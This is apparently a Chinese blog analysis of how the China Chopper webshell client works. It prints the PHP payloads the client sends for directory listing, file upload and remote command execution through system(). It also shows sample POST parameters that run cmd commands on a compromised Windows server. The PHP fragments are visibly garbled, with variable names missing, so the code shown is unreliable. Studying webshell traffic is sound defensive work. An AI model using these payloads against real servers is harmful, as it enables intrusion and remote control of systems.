中国菜刀原理
一、自写脚本
@ini_set(“display_errors”,“0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;print(“hello
PHP!”);;echo("|<-");die();
-
先用@ini_set(“display_errors”,“0”);临时关闭PHP的错误显示功能
-
@set_time_limit(0);防止像dir、上传文件大马时超时
-
@set_magic_quotes_runtime(0);关闭魔术引号,这东西在4.0以后就不怎么用了
-
echo("->|");没啥好说的
-
print(“hello PHP!”);输出字符串
-
die();人如其名
二、文件管理
@ini_set(“display_errors”,“0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;_POST[“z1”]);D);if(M=NULL;N=@readdir(M.F);};echo("|<-");die();&z1=C:\inetpub\wwwroot\
重点看:
_POST["z1"]);
D);
if(M=NULL;
N=@readdir(M.F);
};
echo("|<-");
die();
opendir() 函数打开一个目录句柄,可由 closedir(),readdir() 和 rewinddir() 使用。
若成功,则该函数返回一个目录流,否则返回 false 以及一个 error。可以通过在函数名前加上 “@” 来隐藏 error 的输出。
readdir() 函数返回由 opendir() 打开的目录句柄中的条目。
若成功,则该函数返回一个文件名,否则返回 false。
fileperms() 函数返回文件或目录的权限。
若成功,则返回文件的访问权限。若失败,则返回 false。
base_convert() 函数在任意进制之间转换数字。
语法
base_convert(number,frombase,tobase)
filesize() 函数返回指定文件的大小。
若成功,则返回文件大小的字节数。若失败,则返回 false 并生成一条 E_WARNING 级的错误。
从代码可以清楚地看出,在接收z1=C:\inetpub\wwwroot\这个参数后,代码打开指定目录的句柄,然后进行循环扫描,并附带上权限、时间、大小、日期这四个参数,用\t制表符拼在一起捆绑发送回客户端,这是一种很常见的做法,将所有的需要的参数用一个定界符分开然后捆绑发送,到客户端怎么做呢?根据我自己的C变成经验,一定是用string_split之类的函数分开来,再循环一一显示在UI上,如果想要深究可以用IDA和OD逆向分析一下。
执行完这些代码之后,就完成了列目录的功能。
三、上传文件
@ini_set(“display_errors”,“0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;_POST[“z1”]);_POST[“z2”];c);c);i=0;c);buf.=urldecode("%".substr(i,2));echo(@fwrite(fopen(buf)?“1”:“0”);;echo("|<-");die();
整理一下代码:
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
_POST["z1"]);
_POST["z2"];
c);
c);
i=0;c);buf.=urldecode("%".substr(i,2));
echo(@fwrite(fopen(buf)?"1":"0");;
echo("|<-");
die();
&z1=C:\\inetpub\\wwwroot\\1.png
&z2=.....................
代码基本上来说最关键的就是那个fwrite,就是将我们指定的装满数据的缓冲区写入我们指定的一个路径中。只要apache用户在当前目录下有写权限,php调用win api的时候就能完成写操作。
四、虚拟终端
@ini_set(“display_errors”,“0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;_POST[“z1”]);_POST[“z2”]);_SERVER[“SCRIPT_FILENAME”]);d,0,1)=="/"?"-c
'{r="{r." 2>&1");;echo("|<-");die(); &z1=cmd &z2=cd /d
“C:\wamp\www”&dir&echo [S]&cd&echo [E]
整理一下代码:
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
_POST["z1"]);
_POST["z2"]);
_SERVER["SCRIPT_FILENAME"]);
d,0,1)=="/"?"-c '{r="{r." 2>&1");;
echo("|<-");
die();
&z1=cmd
&z2=cd /d "C:\wamp\www\"&dir&echo [S]&cd&echo [E]
dirname() 函数返回路径中的目录部分。
$_SERVER[“SCRIPT_FILENAME”]:
当前执行脚本的绝对路径。
如果在命令行界面(Command Line Interface, CLI)使用相对路径执行脚本,例如 file.php 或 …/file.php,那么$_SERVER[‘SCRIPT_FILENAME’] 将包含用户指定的相对路径。
substr() 函数返回字符串的一部分。
substr(string,start,length)
string system(string command, int [return_var]);
本函数就像是 C 语中的函数 system(),用来执行指令,并输出结果。若是 return_var 参数存在,则执行 command 之后的状态会填入 return_var 中。同样值得注意的是若需要处理用户输入的资料,而又要防止用户耍花招破解系统,则可以使用 EscapeShellCmd()。若 PHP 以模块式的执行,本函数会在每一行输出后自动更新 Web 服务器的输出缓冲暂存区。若需要完整的返回字符串,且不想经过不必要的其它中间的输出界面,可以使用 PassThru()。
如果return_val存在的话,那么执行的结果信息将被写入return_val中,@system($r." 2>&1");;我们都知道在C语言中,2代表错误输出流的意思,PHP是用C写的,当然也继承了这个特性,那这个意思就是执行系统命令,并屏蔽错误显示。
d,0,1)=="/" ? “-c '{s}”;
这是一个三元条件表达式,根据这个文件路径的第一个字符是否是"/"来决定命令的格式
因为linux下,所有的文件路径的第一个字符一定是"/",并且linux下的cmd命令的参数格式为-c
而windows下,所有文件路径的第一个字符串一定不是"/",并且windows下的cmd命令的参数格式为/c
这就是这个三目运算符的原因